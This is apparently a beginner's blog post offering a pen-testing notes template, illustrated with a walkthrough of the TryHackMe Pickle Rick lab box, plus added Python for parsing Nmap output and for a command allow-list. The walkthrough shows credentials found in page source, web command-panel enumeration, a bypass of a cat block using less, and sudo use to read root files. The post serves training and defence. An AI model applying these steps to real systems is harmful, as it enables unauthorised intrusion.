Pen-testing Notes Template


There is a lot going on when pen-testing a box. Bits of information that may seem irrelevant can become valuable “cookie crumbs” on the long trail to obtaining root. Your journey doesn’t end there. Then comes the fun part…documentation!

Below is a simple breakdown of how I take notes and keep track of progress during pen-testing. Remember, everyone has their own style. The right answer is however you personally root the box. Challenge yourself and watch numerous tutorials on how others achieved the same goal. Use the differences in approaches to learn a new technique, add a line to your thought process, or harden your own defenses so it doesn't happen to you.

This is by no means a be-all-end-all solution. While tackling boxes I keep track of all my documentation in a simple .txt file. This file contains all the commands, outputs, code and thoughts (even the dumb ones) I have during the process. It can become quite lengthy, but when you need to step away for a bit (which I do a lot) the walk-through guide is a life saver. Not to mention you are doing all the heavy lifting for your documentation in real time, which gives you a master file to reference at the finish line.

There are general tools and procedures you will use on almost every box. I have included the 4 initial steps I take on almost every box. Each section is filled out with outputs, notes, findings, etc. Enter additional steps as needed. Recording your screen/actions is also invaluable when it comes to writing and reviewing your work for documentation.

Have a suggestion for something to add to my template? Let me know! :)

Let us begin!

Client/Box================================

  • Title of Box
  • IP Address: <Address_Here>

Flags/Questions/What Are We Attempting To Find===========

  1. Flag #1
  2. Flag #2
  3. Flag #3

What Do We Know============================

  1. Crumb_1
  2. Crumb_2
  3. Crumb_3

Walk-Through/Step By Step Guide===================

Step 1: Visit IP Address In Browser With Burp Suite Running (Mapping)

<Content_Here>

======================================= Step 2: Nmap IP Address

<Content_Here>

======================================= Step 3: Check robots.txt

<Content_Here>

======================================= Step 4: Directory Discovery (Gobuster or DirBuster)

<Content_Here>

======================================= Step 5: Next Step

<Content_Here>

=======================================

Below is an example of what the template could end up looking like. This example was created from the TryHackMe — Pickle Rick box. https://www.tryhackme.com/room/picklerick

Client/Box================================

  • TryHackMe Pickle_Rick Box
  • IP Address: 10.10.203.236

Flags/Questions/What Are We Attempting To Find===========

  1.) What is the first ingredient Rick needs?
  • Mr. Meeseek Hair

  2.) What is the second ingredient Rick needs?
  • 1 Jerry Tear

  3.) What is the final ingredient Rick needs?
  • Fleeb Juice

What Do we Know===========================

1.) Credentials: R1ckRul3s: Wubbalubbadubdub (password originally unknown)

2.) URL_Path = /assets

3.) Port 22: SSH — OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)

4.) Port 80: TCP — Apache httpd 2.4.18 ((Ubuntu))

5.) http-title: Rick is sup4r cool

6.) Wubbalubbadubdub exists <= This was Rick's catchphrase in season 1

7.) Manual GET header change to avoid the re-direct: GET /login.php => http://10.10.203.236/portal.php <= This matches the portal.jpg because the URL is /portal.php

8.) Used Command tab to get first ingredient = mr. meeseek hair

9.) Used command tab to get clue on second ingredient = “Look around file system”

10.) Found file: /home/rick/"second ingredients" => less /home/rick/"second ingredients" => 1 jerry tear

11.) Determined we have root access => sudo /root/3rd.txt

Walk-Through/Step By Step Guide====================

Step 1: F12 to view web source

<!DOCTYPE html>
<html lang="en">
<head>
<title>Rick is sup4r cool</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="assets/bootstrap.min.css">
<script src="assets/jquery.min.js"></script>
<script src="assets/bootstrap.min.js"></script>
<style>
.jumbotron {
background-image: url("assets/rickandmorty.jpeg");
background-size: cover;
height: 340px;
}
</style>
</head>
<body>

<div class="container">
<div class="jumbotron"></div>
<h1>Help Morty!</h1></br>
<p>Listen Morty… I need your help, I’ve turned myself into a pickle again and this time I can’t change back!</p></br>
<p>I need you to <b>*BURRRP*</b>….Morty, logon to my computer and find the last three secret ingredients to finish my pickle-reverse potion. The only problem is,
I have no idea what the <b>*BURRRRRRRRP*</b>, password was! Help Morty, Help!</p></br>
</div>

<!--

Note to self, remember username!

Username: R1ckRul3s

-->

</body>
</html>

=======================================

Step 2: Nmap IP Address

Nmap scan report for 10.10.203.236
Host is up (0.22s latency).
Not shown: 65533 closed ports

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 67:2c:3d:e7:ee:3b:de:90:43:81:04:df:ff:d4:7b:47 (RSA)
| 256 1a:a2:b6:30:5e:ef:45:d6:35:32:31:de:1b:01:32:3e (ECDSA)
|_ 256 00:7d:0b:1d:f5:fd:bc:86:f3:62:9c:fb:85:74:f1:04 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool

No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

TCP/IP fingerprint:
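An added example (not from the original post): a small Python parser that turns the Nmap report above into numbered "What Do We Know" crumbs in the format this post uses, so scan output feeds the notes file directly. The report text is copied from the scan above, trimmed to the lines the parser reads.

```python
import re

# Copied from the Nmap report in this post (trimmed to the lines the parser uses).
NMAP_REPORT = """\
Nmap scan report for 10.10.203.236
Host is up (0.22s latency).
Not shown: 65533 closed ports

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|_  256 00:7d:0b:1d:f5:fd:bc:86:f3:62:9c:fb:85:74:f1:04 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
SCRIPT_RE = re.compile(r"^\|_?\s*([\w-]+):\s+(\S.*)$")  # one-line NSE results only


def parse_nmap(report: str) -> dict:
    """Pull host, port table rows and one-line script results out of Nmap normal output."""
    found = {"host": None, "ports": [], "scripts": {}}
    for line in report.splitlines():
        line = line.rstrip()
        if m := HOST_RE.match(line):
            found["host"] = m.group(1)
        elif m := PORT_RE.match(line):
            port, proto, state, service, version = m.groups()
            found["ports"].append((int(port), proto, state, service, version.strip()))
        elif m := SCRIPT_RE.match(line):
            found["scripts"][m.group(1)] = m.group(2).strip()
    return found


def crumbs(report: str) -> list:
    """Render the parsed facts as numbered 'What Do We Know' lines, one fact each."""
    found = parse_nmap(report)
    facts = [f"Port {p}: {svc.upper()} - {ver}"
             for p, _, state, svc, ver in found["ports"] if state == "open"]
    facts += [f"{name}: {value}" for name, value in found["scripts"].items()
              if name == "http-title"]
    return [f"{i}.) {fact}" for i, fact in enumerate(facts, start=1)]
```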

=======================================

Step 3: Visit http://10.10.203.236/assets/

Index of /assets
[ICO] Name Last modified Size Description
[PARENTDIR] Parent Directory —
[TXT] bootstrap.min.css 2019-02-10 16:37 119K
[ ] bootstrap.min.js 2019-02-10 16:37 37K
[IMG] fail.gif 2019-02-10 16:37 49K
[ ] jquery.min.js 2019-02-10 16:37 85K
[IMG] picklerick.gif 2019-02-10 16:37 222K
[IMG] portal.jpg 2019-02-10 16:37 50K
[IMG] rickandmorty.jpeg 2019-02-10 16:37 488K

Apache/2.4.18 (Ubuntu) Server at 10.10.203.236 Port 80

=======================================

Step 4: See if there is a robots.txt file

http://10.10.203.236/robots.txt <=== Page exists

Wubbalubbadubdub

  • Googling the phrase tells us this is Rick’s favorite catchphrase in season 1

=======================================

Step 5: Hit Dead End

Go back and review what we know and what the current tools are showing us:
1.) Website itself
2.) Burp Suite - review each request/response; something needs to stand out
3.) Nmap

*Currently running Gobuster

=======================================

Step 6: Burp Suite - 301 Moved response

  • Burp Proxy is telling us that our request is being re-directed
  • Googled whether we can stop the request before it hits the re-direct
  • Saw an example of someone modifying the GET header to go to login.php
  • When I made this edit we got an HTTP 200 response and it led us to a login page

Attempted to use the following to log in:
- Username = R1ckRul3s
- Password = Wubbalubbadubdub

Login Successful

  • The "portal".jpg had me interested because a login page is also referred to as a portal
  • Rick and Morty use portals to get to places so I knew there is something to do with that
  • The URL for the login page is “/portal.php”

Since I got the login before gobuster returned anything I have canceled gobuster for now.

=======================================

Step 7: http://10.10.203.236/portal.php “Commands” Tab

- All other tabs send us to "/denied.php".
- It says only the "REAL" Rick can access these pages.
- Most likely means we need to get root privileges to access them

- I believe we need to use the Commands tab to enter terminal commands to get the information we need

Attempted commands:
1.) whoami = www-data

2.) ls
Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt

3.) pwd
/var/www/html

4.) getent passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash

5.) cat Sup3rS3cretPickl3Ingred.txt
Command disabled to make it hard for future PICKLEEEE RICCCKKKK.

6.) cat clue.txt
Command disabled to make it hard for future PICKLEEEE RICCCKKKK.

**** Attempt to use a command other than cat that still allows you to read a file

7.) less clue.txt
Look around the file system for the other ingredient.

8.) less Sup3rS3cretPickl3Ingred.txt
mr. meeseek hair

9.) find / | grep rick
/home/rick/second ingredients

10.) less /home/rick/"second ingredients" (remember paths with spaces need quotes)
1 jerry tear

11.) Check what permissions we have

sudo -l

We have root permissions.

12.) There is a /root directory. Use sudo to get in it.

sudo /root/3rd.txt

Contains the last ingredient.
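The Commands tab above blocked `cat` but let `less` read the same file, which is what happens when a filter only denies command names it knows about. As an added example (not code from the original post or from the box itself), the hypothetical `denylist_check` models that behaviour and `allowlist_check`/`run_allowed` show the hardened form: only named commands with validated arguments are run, in argv form and never through a shell.

```python
import re
import shlex
import subprocess

# Deny-list in the spirit of the "Command disabled" message in this post: the
# filter only names cat, so any other reader (less, in the walkthrough) passes.
DENIED = {"cat"}

# Allow-list for the hardened version: command name -> maximum argument count.
# (Hypothetical policy chosen for this example.)
ALLOWED = {"whoami": 0, "pwd": 0, "ls": 1}

# Arguments may only be simple file names: no options, no separators, no "..".
SAFE_ARG = re.compile(r"[A-Za-z0-9_.-]+")


def denylist_check(cmdline: str) -> bool:
    """True if a name-based deny-list would let this command line through."""
    argv = shlex.split(cmdline)
    return bool(argv) and argv[0] not in DENIED


def safe_arg(arg: str) -> bool:
    """Reject options, path separators and parent-directory references."""
    return SAFE_ARG.fullmatch(arg) is not None and ".." not in arg and not arg.startswith("-")


def allowlist_check(cmdline: str) -> bool:
    """True only for a known command with at most the expected number of validated args."""
    argv = shlex.split(cmdline)
    if not argv or argv[0] not in ALLOWED:
        return False
    args = argv[1:]
    return len(args) <= ALLOWED[argv[0]] and all(safe_arg(a) for a in args)


def run_allowed(cmdline: str):
    """Run the command only if it passes the allow-list; argv form, never via a shell."""
    if not allowlist_check(cmdline):
        return None
    argv = shlex.split(cmdline)
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=5)
    return proc.stdout
```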

Written by

Starting my journey into Cybersecurity. Documenting walk-through guides to practice documentation and learn a thing or two.
